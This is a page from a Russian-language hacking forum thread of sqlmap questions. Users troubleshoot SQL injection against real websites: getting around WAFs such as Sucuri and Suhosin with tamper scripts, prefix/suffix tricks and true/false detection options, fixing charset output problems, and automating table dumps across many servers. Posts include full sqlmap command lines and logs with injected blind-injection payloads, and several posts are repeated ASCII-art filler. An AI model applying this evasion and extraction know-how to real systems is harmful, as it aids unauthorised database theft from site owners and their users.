Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Смотря какой вид SQL инъекции, где и что еще дополнительно меняет/фильтрует запрос и тд. А так, да, руками Sucuri обходится, но с не большими нюансами, на счёт tamper скриптов от sqlmap не уверен, что там из стандартного набора получиться обойти без проблем и блокировки, разве что только переписать/написать свой.
    P.S. Вы плохо гуглите, информации из гугла по методам обходам WAF, хватит для обхода!
     
  2. none222

    none222 Guest

    Reputations:
    0
    ^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^
    ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^
    ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^
    ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^
    ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^
    ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^
    ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^
    ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^
    ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^
    ^^^^^^^#####^^^############^^##^^^^
    ^^^^^^^^^^##^^^^##^^^^######^^^^^^^
    ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^
    ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^
    ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^
    ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^
    ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^
    ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^
    ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
     
    #762 none222, 9 Oct 2018
    Last edited by a moderator: 6 Nov 2020
  3. none222

    none222 Guest

    Reputations:
    0
    ^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^
    ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^
    ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^
    ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^
    ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^
    ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^
    ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^
    ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^
    ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^
    ^^^^^^^#####^^^############^^##^^^^
    ^^^^^^^^^^##^^^^##^^^^######^^^^^^^
    ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^
    ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^
    ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^
    ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^
    ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^
    ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^
    ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
     
    #763 none222, 9 Oct 2018
    Last edited by a moderator: 6 Nov 2020
  4. vasyaz

    vasyaz New Member

    Joined:
    29 Oct 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    Делаю любой дамп колонок выходит
    [09:08:59] [INFO] retrieving the length of query output
    [09:09:01] [INFO] retrieved:
    [09:09:02] [INFO] resumed: ?????????????????????

    --no-cast --hex - не помогло
     
  5. Ne0h16xor

    Ne0h16xor New Member

    Joined:
    13 Oct 2018
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
  6. none222

    none222 Guest

    Reputations:
    0
    ^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^
    ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^
    ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^
    ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^
    ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^
    ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^
    ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^
    ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^
    ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^
    ^^^^^^^#####^^^############^^##^^^^
    ^^^^^^^^^^##^^^^##^^^^######^^^^^^^
    ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^
    ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^
    ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^
    ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^
    ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^
    ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^
    ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
     
    #766 none222, 15 Oct 2018
    Last edited by a moderator: 6 Nov 2020
  7. none222

    none222 Guest

    Reputations:
    0
    ^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^
    ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^
    ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^
    ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^
    ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^
    ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^
    ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^
    ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^
    ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^
    ^^^^^^^#####^^^############^^##^^^^
    ^^^^^^^^^^##^^^^##^^^^######^^^^^^^
    ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^
    ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^
    ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^
    ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^
    ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^
    ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^
    ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
     
    #767 none222, 15 Oct 2018
    Last edited by a moderator: 6 Nov 2020
  8. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    158
    Likes Received:
    41
    Reputations:
    2
    в слепой нет же вывода.

    --random-agent с одной "t"
     
  9. vasyaz

    vasyaz New Member

    Joined:
    29 Oct 2012
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
    В браузере вообще не выводится. Пробовал тамперы не помогло. Может есть какой то определенный тампер для этого? В этой теме видел, что у человека такая же проблема была, писал про кодировку.
    Еще выводится такая строчка...
    [22:49:09] [INFO] heuristics detected web page charset 'windows-1252'
    Выставлял --charset=utf8, --charset=windows-1251, --charset=windows-1252
     
  10. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Посмотрите в сторону логов запрос/ответ, могу допустить, что на сервере стоит фаерволл и он блокирует попытки слить данные из БД, на что скрипт отвечает Вам ? символами такое часто случается. Или как вариант который уже советовали, что-то не так с запросом и скрипт должным образом не выполняется на сервере, возьмите 2 запроса из скрипта где он пытается получить какой-либо символ 1-true, 2-false и проверьте руками, все ли верно там с выводом данных на странице, ответом сервера и так далее!
    P.S. Попробуйте еще явно указать скрипту варианты по которым ему определять True или False запрос, например --code=200, --string="Antichat" (--not-string="Antichat"), --regex, --titles (если заголовок меняется) и так далее, это как очередное допущение, не более :)
     
  11. none222

    none222 Guest

    Reputations:
    0
    ^^^^^^^^^^^^^^^^^^^^^###^^^^^^^^^^
    ^^^^^^^^^^^^^^^^#####^^^^####^^^^^^
    ^^^^^^^^^^^^^^#^#^#^^^^#^^^^^#^^^^^
    ^^^^^^^^^^^^^#^#^^#^^#^^^^^#^^#^^^^
    ^^^^^^^^^^^^^#^#^#^#^#^^^##^^^#^^^^
    ^^^^^^#^^^^^#^^^#^#^#^####^^^#^^^^^
    ^^^^^^##^^^^#^^^#^#^^^^#^^^#^#^^^^^
    ^^^^^^###^^^^#^^^#^#^^^#^^#^^^#^^^^
    ^^^^^^#####^^^#^^#^^#^^##^^^^^#^^^^
    ^^^^^^^#####^^^############^^##^^^^
    ^^^^^^^^^^##^^^^##^^^^######^^^^^^^
    ^^^^^^^^^^^##^^###^####^^^^^^^^^^^^
    ^^^^^^^^^^^#####^^^^^^^^^^^^^^^^^^^
    ^^^^^^^^^^###^^^^####^^^^^^^^^^^^^^
    ^^^^^^^^^##^^^^^^^#####^^^^^^^^^^^^
    ^^^^^^^^##^^^^^^^^^^####^^^^^^^^^^^
    ^^^^^^^##^^^^^^^^^^^^###^^^^^^^^^^^
    ^^^^^^##^^^^^^^^^^^^^^^#^^^^^^^^^^^
     
    #771 none222, 16 Oct 2018
    Last edited by a moderator: 6 Nov 2020
  12. msk_smail

    msk_smail New Member

    Joined:
    9 Mar 2016
    Messages:
    48
    Likes Received:
    4
    Reputations:
    0
    Добрый день! Раскрутил SQL но WAF не дает список получить, пробовал no-cast и hex с тамперами - ничего не помогает , подскажите как быть ?
    Code:
    --fresh-queries --tamper=unionalltounion --prefix="111'/*!40222" --suffix="*/!'" --no-cast -v 3 --level=5 --risk=3 -p id --batch --dbs
    Code:
    back-end DBMS: MySQL unknown
    [09:35:14] [INFO] fetching database names
    [09:35:14] [INFO] fetching number of databases
    [09:35:14] [PAYLOAD] 1'"
    [09:35:14] [WARNING] reflective value(s) found and filtering out
    [09:35:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51)*9950*/!'
    [09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48)*9950*/!'
    [09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9)*9950*/!'
    [09:35:14] [INFO] retrieved:
    [09:35:14] [DEBUG] performed 3 queries in 0.23 seconds
    [09:35:14] [ERROR] unable to retrieve the number of databases
    [09:35:14] [INFO] falling back to current database
    [09:35:14] [INFO] fetching current database
    [09:35:14] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>64)*1021*/!'
    [09:35:15] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>32)*1021*/!'
    [09:35:15] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>1)*1021*/!'
    [09:35:15] [INFO] retrieved:
    [09:35:15] [DEBUG] performed 3 queries in 0.22 seconds
    [09:35:15] [CRITICAL] unable to retrieve the database names
     
  13. msk_smail

    msk_smail New Member

    Joined:
    9 Mar 2016
    Messages:
    48
    Likes Received:
    4
    Reputations:
    0
  14. msk_smail

    msk_smail New Member

    Joined:
    9 Mar 2016
    Messages:
    48
    Likes Received:
    4
    Reputations:
    0
    Единственное, что еще нашел - на сервере установлен Suhosin patch , но они сразу пишут какой тампер использовать, я через него и раскрутил уязвимость , но вот с выводом беда (((
    Code:
    [10:16:22] [INFO] checking if the injection point on GET parameter 'id' is a false positive
    [10:16:25] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
    [10:16:25] [WARNING] it appears that the character '>' is filtered by the back-end server. You are strongly advised to rerun with the '--tamper=between'
    GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
    sqlmap identified the following injection point(s) with a total of 277 HTTP(s) requests:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: MySQL boolean-based blind - Parameter replace (bool*int)
        Payload: class=27&id=(1291=1291)*2659*/!'
    ---
     
  15. loidez

    loidez Member

    Joined:
    28 Feb 2018
    Messages:
    19
    Likes Received:
    7
    Reputations:
    0
    Хочу сделать чтобы sqlmap автоматом вытягивал нужные мне записи из списка баз на каждом сервере.
    Подскажите, можно ли указать дамп нужных мне таблиц и колонок используя регулярные выражения? Пробовал --search, но он не работает в связке с --dump.
     
  16. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    Может есть смысл руками ?
     
  17. loidez

    loidez Member

    Joined:
    28 Feb 2018
    Messages:
    19
    Likes Received:
    7
    Reputations:
    0
    Скажите, что делает суффикс -BR (--suffix="-BR")?
     
  18. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,788
    Likes Received:
    872
    Reputations:
    859
    _________________________
    t0ma5 likes this.
  19. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    831
    Likes Received:
    817
    Reputations:
    90
    -BN часто юзают при консольном вызове mysql, дабы отключить форматирование, откуда "BR" и причем тут sqlmap, есть предыстория)?
     
    _________________________
    erwerr2321 likes this.
  20. loidez

    loidez Member

    Joined:
    28 Feb 2018
    Messages:
    19
    Likes Received:
    7
    Reputations:
    0
    Про сам суффикс это понятно, вопрос про его использование в контекста самого языка MySQL

     
Loading...